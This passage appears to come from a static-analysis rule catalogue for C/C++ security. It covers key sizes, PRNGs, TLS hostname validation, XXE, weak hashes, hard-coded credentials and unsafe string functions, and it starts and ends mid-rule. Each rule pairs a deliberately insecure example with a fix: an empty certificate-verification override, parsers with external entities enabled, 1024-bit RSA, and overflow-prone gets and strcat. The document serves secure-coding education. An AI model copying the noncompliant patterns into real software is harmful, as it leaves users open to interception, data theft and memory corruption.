In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Botan

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 1024); // Noncompliant
}

Here is an example with the generation of a key as part of a Discrete Logarithm (DL) group, a Digital Signature Algorithm (DSA) parameter:

#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/1024"); // Noncompliant
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp160k1"); // Noncompliant
}

Compliant solution

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 2048);
}

#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/2048");
}

#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp224k1");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of a key generated with an elliptic curve algorithm is indicated directly in its name. For example, secp256k1 generates a 256-bit private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterparts.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.


Resources

Articles & blog posts

Standards

c:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led to vulnerabilities in the past.

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As these functions rely on a pseudorandom number generator, they should not be used for security-critical applications or for protecting sensitive data.

Ask Yourself Whether

  • The code using the generated value requires it to be unpredictable, as is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use functions which rely on a strong random number generator such as randombytes_uniform() or randombytes_buf() from libsodium, or randomize() from Botan.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

#include <cstdlib>
// ...

void f() {
  int random_int = std::rand(); // Sensitive
}

Compliant Solution

#include <sodium.h>
#include <botan/system_rng.h>
// ...

void f() {
  char random_chars[10];
  randombytes_buf(random_chars, 10); // Compliant
  uint32_t random_int = randombytes_uniform(10); // Compliant

  uint8_t random_bytes[10];
  Botan::System_RNG system;
  system.randomize(random_bytes, 10); // Compliant
}

See

c:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Botan

Code examples

The following code contains examples of disabled hostname validation.

Hostname validation is disabled by overriding tls_verify_cert_chain with an empty implementation. It is highly recommended to keep the original implementation.

Noncompliant code example

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks
{
    virtual void tls_verify_cert_chain(
              const std::vector<Botan::X509_Certificate> &cert_chain,
              const std::vector<std::shared_ptr<const Botan::OCSP::Response>> &ocsp_responses,
              const std::vector<Botan::Certificate_Store *> &trusted_roots,
              Botan::Usage_Type usage,
              const std::string &hostname,
              const Botan::TLS::Policy &policy)
    override  { }
};

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12); // Noncompliant
}

Compliant solution

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks { };

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12);
}

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Documentation

Standards

c:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, or SHA-3, are recommended. For password hashing, it is even better to use algorithms that are deliberately slow to compute, like bcrypt, scrypt, argon2 or pbkdf2, because they slow down brute force attacks.

Sensitive Code Example

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("MD5")); // Sensitive
    return hash->process(input);
}

Compliant Solution

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("SHA-512")); // Compliant
    return hash->process(input);
}

See

c:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. This means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease attackers' chances of successfully leaking data or stealing credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that the http protocol is being deprecated by major web browsers.

In the past, it has led to several vulnerabilities.

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

char* http_url = "http://example.com"; // Sensitive
char* ftp_url = "ftp://anonymous@example.com"; // Sensitive
char* telnet_url = "telnet://anonymous@example.com"; // Sensitive
#include <curl/curl.h>

CURL *curl_ftp = curl_easy_init();
curl_easy_setopt(curl_ftp, CURLOPT_URL, "ftp://example.com/"); // Sensitive

CURL *curl_smtp = curl_easy_init();
curl_easy_setopt(curl_smtp, CURLOPT_URL, "smtp://example.com:587"); // Sensitive

Compliant Solution

char* https_url = "https://example.com";
char* sftp_url = "sftp://anonymous@example.com";
char* ssh_url = "ssh://anonymous@example.com";
#include <curl/curl.h>

CURL *curl_ftps = curl_easy_init();
curl_easy_setopt(curl_ftps, CURLOPT_URL, "ftp://example.com/");
curl_easy_setopt(curl_ftps, CURLOPT_USE_SSL, CURLUSESSL_ALL); // FTP transport is done over TLS

CURL *curl_smtp_tls = curl_easy_init();
curl_easy_setopt(curl_smtp_tls, CURLOPT_URL, "smtp://example.com:587");
curl_easy_setopt(curl_smtp_tls, CURLOPT_USE_SSL, CURLUSESSL_ALL); // SMTP with STARTTLS

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

c:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to several vulnerabilities.

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule looks for hard-coded credentials in variable names that match any of the patterns from the provided list.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.
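As one illustration of keeping the secret out of the source, the password can be read from the environment at runtime. A minimal sketch; DB_PASSWORD and get_database_password are hypothetical names, not part of any API:

```c
#include <stdio.h>
#include <stdlib.h>

// Returns the database password from the environment, or NULL if the
// variable is unset, so the secret never appears in the source code.
const char *get_database_password(void) {
    const char *pw = getenv("DB_PASSWORD");
    if (pw == NULL) {
        fprintf(stderr, "DB_PASSWORD is not set\n");
    }
    return pw;
}
```

Environment variables are only one option; a secrets-management service or a configuration file excluded from version control serves the same purpose.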

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string password = "secret"; // Sensitive
dbi_conn_set_option(conn, "password", password.c_str());

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string password = getDatabasePassword(); // Compliant
dbi_conn_set_option(conn, "password", password.c_str()); // Compliant

See

c:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in Xerces

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

#include "xercesc/parsers/XercesDOMParser.hpp"

void parse() {
  XercesDOMParser *DOMparser = new XercesDOMParser();
  DOMparser->setCreateEntityReferenceNodes(false); // Noncompliant
  DOMparser->setDisableDefaultEntityResolution(false); // Noncompliant

  DOMparser->parse(xmlFile);
}

By default, entities resolution is enabled for XMLReaderFactory::createXMLReader.

#include "xercesc/sax2/SAX2XMLReader.hpp"

void parse() {
  SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();
  reader->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, false); // Noncompliant

  reader->parse(xmlFile);
}

By default, entities resolution is enabled for SAXParser.

#include "xercesc/parsers/SAXParser.hpp"

void parse() {
  SAXParser* SAXparser = new SAXParser();
  SAXparser->setDisableDefaultEntityResolution(false); // Noncompliant

  SAXparser->parse(xmlFile);
}

Compliant solution

By default, XercesDOMParser is safe.

#include "xercesc/parsers/XercesDOMParser.hpp"

void parse() {
  XercesDOMParser *DOMparser = new XercesDOMParser();
  DOMparser->setCreateEntityReferenceNodes(true);
  DOMparser->setDisableDefaultEntityResolution(true);

  DOMparser->parse(xmlFile);
}
#include "xercesc/sax2/SAX2XMLReader.hpp"

void parse() {
  SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();
  reader->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);

  reader->parse(xmlFile);
}
#include "xercesc/parsers/SAXParser.hpp"

void parse() {
  SAXParser* SAXparser = new SAXParser();
  SAXparser->setDisableDefaultEntityResolution(true);

  SAXparser->parse(xmlFile);
}

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

c:S5798

Why is this an issue?

The compiler is generally allowed to remove code that does not have any effect, according to the abstract machine of the C language. This means that if you have a buffer that contains sensitive data (for instance passwords), calling memset on the buffer before releasing the memory will probably be optimized away.

The function memset_s behaves similarly to memset, but the main difference is that it cannot be optimized away; the memory will be overwritten in all cases. You should always use this function to scrub security-sensitive data.

This rule raises an issue when a call to memset is followed by the destruction of the buffer.

Note that memset_s is defined in annex K of C11, so to have access to it, you need a standard library that supports it (this can be tested with the macro __STDC_LIB_EXT1__), and you need to enable it by defining the macro __STDC_WANT_LIB_EXT1__ before including <string.h>. Other platform-specific functions can perform the same operation, for instance SecureZeroMemory (Windows) or explicit_bzero (FreeBSD).
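When none of these functions is available, a commonly used portable fallback is to write zeros through a volatile pointer; volatile accesses are observable behavior, so the compiler may not remove them. A minimal sketch (secure_memzero is a hypothetical helper name, not part of the rule's recommendation):

```c
#include <stddef.h>

// Scrubs len bytes starting at buf. The volatile-qualified pointer keeps
// the stores from being optimized away like a plain memset could be.
static void secure_memzero(void *buf, size_t len) {
    volatile unsigned char *p = (volatile unsigned char *)buf;
    while (len--) {
        *p++ = 0;
    }
}
```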

Noncompliant code example

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset(password, ' ', strlen(password)); // Noncompliant, password is about to be freed
  memset(localToken, ' ', strlen(localToken)); // Noncompliant, localToken is about to go out of scope
  free(password);
}

Compliant solution

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset_s(password, bufferSize, ' ', strlen(password));
  memset_s(localToken, sizeof(localToken), ' ', strlen(localToken));
  free(password);
}

Resources

c:S1079

Why is this an issue?

The %s placeholder is used to read a word into a string.

By default, there is no restriction on the length of that word, and the developer is required to pass a sufficiently large buffer for storing it.

No matter how large the buffer is, there will always be a longer word.

Therefore, programs relying on %s are vulnerable to buffer overflows.

A field width specifier can be used together with the %s placeholder to limit the number of bytes which will be written to the buffer.

Note that an additional byte is required to store the null terminator.

Noncompliant code example

char buffer[10];
scanf("%s", buffer);      // Noncompliant - will overflow when a word longer than 9 characters is entered

Compliant solution

char buffer[10];
scanf("%9s", buffer);     // Compliant - will not overflow

Resources

c:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux-based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to several vulnerabilities.

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples below). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such APIs will make sure that:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed
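On POSIX systems, mkstemp() is one such secure-by-design API: it replaces the trailing XXXXXX in the template with an unpredictable suffix and creates the file with mode 0600 (owner-only). A minimal sketch, assuming a POSIX environment (open_temp_file and the "myapp" prefix are illustrative):

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Creates and opens an anonymous temporary file. Unlinking the path right
// away guarantees the file disappears as soon as the descriptor is closed.
int open_temp_file(void) {
    char path[] = "/tmp/myapp-XXXXXX"; // trailing X's are replaced by mkstemp
    int fd = mkstemp(path);
    if (fd == -1) return -1;
    unlink(path);
    return fd;
}
```

The compliant tmpfile() call shown below achieves the same properties when no filename is needed at all.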

Sensitive Code Example

#include <cstdio>
// ...

void f() {
  FILE * fp = fopen("/tmp/temporary_file", "r"); // Sensitive
}
#include <cstdio>
#include <cstdlib>
#include <sstream>
// ...

void f() {
  std::stringstream ss;
  ss << getenv("TMPDIR") << "/temporary_file"; // Sensitive
  FILE * fp = fopen(ss.str().c_str(), "w");
}

Compliant Solution

#include <cstdio>
#include <cstdlib>
// ...

void f() {
  FILE * fp = tmpfile(); // Compliant
}

See

c:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

When creating a file or directory with permissions granted to "others":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process sets 777 permissions on this newly created file

mkdir("myfolder", S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process sets 777 permissions on this newly created directory

When explicitly adding permissions for "others" with the chmod, fchmod or filesystem::permissions functions:

chmod("myfile.txt", S_IRWXU | S_IRWXG | S_IRWXO);  // Sensitive: the process sets 777 permissions on this file

fchmod(fd, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process sets 777 permissions on this file descriptor

When defining a umask that does not mask out read, write and execute permissions for "others":

umask(S_IRWXU | S_IRWXG); // Sensitive: files and folders created afterwards may grant permissions to "others"

Compliant Solution

When creating a file or directory, do not grant permissions to "others":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG); // Compliant

mkdir("myfolder", S_IRWXU | S_IRWXG); // Compliant

When using the chmod, fchmod or filesystem::permissions functions, do not add permissions for "others":

chmod("myfile.txt", S_IRWXU | S_IRWXG);  // Compliant

fchmod(fd, S_IRWXU | S_IRWXG); // Compliant

When defining the umask, mask out read, write and execute permissions for "others":

umask(S_IRWXO); // Compliant: files or directories created afterwards will not have permissions set for "others"

See

c:S1081

Why is this an issue?

When using typical C functions, it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

This rule reports use of the following insecure functions, for which knowing the required size is not generally possible: gets() and getpw().

In such cases, the only way to prevent buffer overflows while using these functions would be to control the execution context of the application.

It is much safer to secure the application from within and to use an alternate, secure function which allows you to define the maximum number of characters to be written to the buffer:

  • fgets or gets_s
  • getpwuid

Noncompliant code example

gets(str); // Noncompliant; `str` buffer size is not checked and it is vulnerable to overflows

Compliant solution

gets_s(str, sizeof(str)); // Prevent overflows by enforcing a maximum size for `str` buffer
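Since gets_s is an optional Annex K function that many standard libraries do not ship, fgets is the portable alternative; it writes at most size-1 characters plus the null terminator. A minimal sketch (read_line is a hypothetical helper name):

```c
#include <stdio.h>
#include <string.h>

// Reads one line from `in` into buf, never writing more than size bytes
// (terminator included), and strips the trailing newline that fgets keeps.
// Returns 0 on success, -1 on end-of-file or error.
int read_line(FILE *in, char *buf, size_t size) {
    if (fgets(buf, (int)size, in) == NULL) return -1;
    buf[strcspn(buf, "\n")] = '\0';
    return 0;
}
```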

Resources

c:S5814

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcat( char *restrict dest, const char *restrict src ); appends the characters of string src at the end of dest. The wcscat does the same for wide characters and should be used with the same guidelines.

Note: the functions strncat and wcsncat might look like attractive safe replacements for strcat and wcscat, but they have their own set of issues (see S5815), and you should probably prefer another, more adapted alternative.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointed to by dest
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strcat_s and wcscat_s functions that were designed as safer alternatives to strcat and wcscat. It is not recommended to use them in all circumstances, because they introduce a runtime overhead and require writing more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strcat(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char *dest = malloc(sizeof(result) + strlen(src)); // No need for +1 for the final null character: sizeof(result) already counts it
  strcpy(dest, result);
  strcat(dest, src); // Compliant: the buffer size was carefully crafted
  int r = doSomethingWith(dest);
  free(dest);
  return r;
}
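Another option, when dynamic allocation is undesirable, is to build the string with snprintf, which bounds the write and makes truncation easy to detect. A minimal sketch (format_result is a hypothetical helper name):

```c
#include <stdio.h>

// Formats "Result: <src>" into dest. snprintf() never writes more than
// size bytes (null terminator included) and returns the length the full
// output would need, which exposes truncation.
// Returns 0 on success, -1 on error or truncation.
int format_result(char *dest, size_t size, const char *src) {
    int needed = snprintf(dest, size, "Result: %s", src);
    if (needed < 0 || (size_t)needed >= size) return -1;
    return 0;
}
```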

See

c:S5813

The function size_t strlen(const char *s) measures the length of the string s (excluding the final null character).
The function size_t wcslen(const wchar_t *s) does the same for wide characters, and should be used with the same guidelines.

Similarly to many other functions in the standard C libraries, strlen and wcslen assume that their argument is not a null pointer.

Additionally, they expect the strings to be null-terminated. For example, the 5-letter string "abcde" must be stored in memory as "abcde\0" (i.e. using 6 characters) to be processed correctly. When a string is missing the null character at the end, these functions will iterate past the end of the buffer, which is undefined behavior.

Therefore, string parameters must end with a proper null character. The absence of this particular character can lead to security vulnerabilities that allow, for example, access to sensitive data or the execution of arbitrary code.

Ask Yourself Whether

  • There is a possibility that the pointer is null.
  • There is a possibility that the string is not correctly null-terminated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use safer functions. The C11 functions strnlen_s and wcsnlen_s from annex K handle typical programming errors.
    Note, however, that they have a runtime overhead and require more code for error handling and therefore are not suited to every case.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions.
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone.
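Where Annex K is unavailable, POSIX strnlen offers a similar bound on the scan. A minimal sketch, assuming a POSIX environment (bounded_length is a hypothetical helper name):

```c
#define _POSIX_C_SOURCE 200809L
#include <string.h>

// Returns the string length, but never scans more than maxlen bytes and
// tolerates a null pointer, so a missing terminator cannot run off the
// end of the buffer.
size_t bounded_length(const char *s, size_t maxlen) {
    return s == NULL ? 0 : strnlen(s, maxlen);
}
```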

Sensitive Code Example

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  return strlen(dest); // Sensitive: "dest" will not be null-terminated if truncation happened
}

Compliant Solution

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  dest[sizeof dest - 1] = 0;
  return strlen(dest); // Compliant: "dest" is guaranteed to be null-terminated
}

See

  • MITRE, CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
  • CERT, STR07-C. - Use the bounds-checking interfaces for string manipulation
c:S5816

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncpy(char * restrict dest, const char * restrict src, size_t count); copies the first count characters from src to dest, stopping at the first null character, and filling extra space with 0. The wcsncpy does the same for wide characters and should be used with the same guidelines.

Both of those functions are designed to work with fixed-length strings and might result in a non-null-terminated string.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • The security of your system can be compromised if the destination is a truncated version of the source
  • The source buffer can be both non-null-terminated and smaller than the count
  • The destination buffer can be smaller than the count
  • You expect dest to be a null-terminated string
  • There is an overlap between the source and the destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

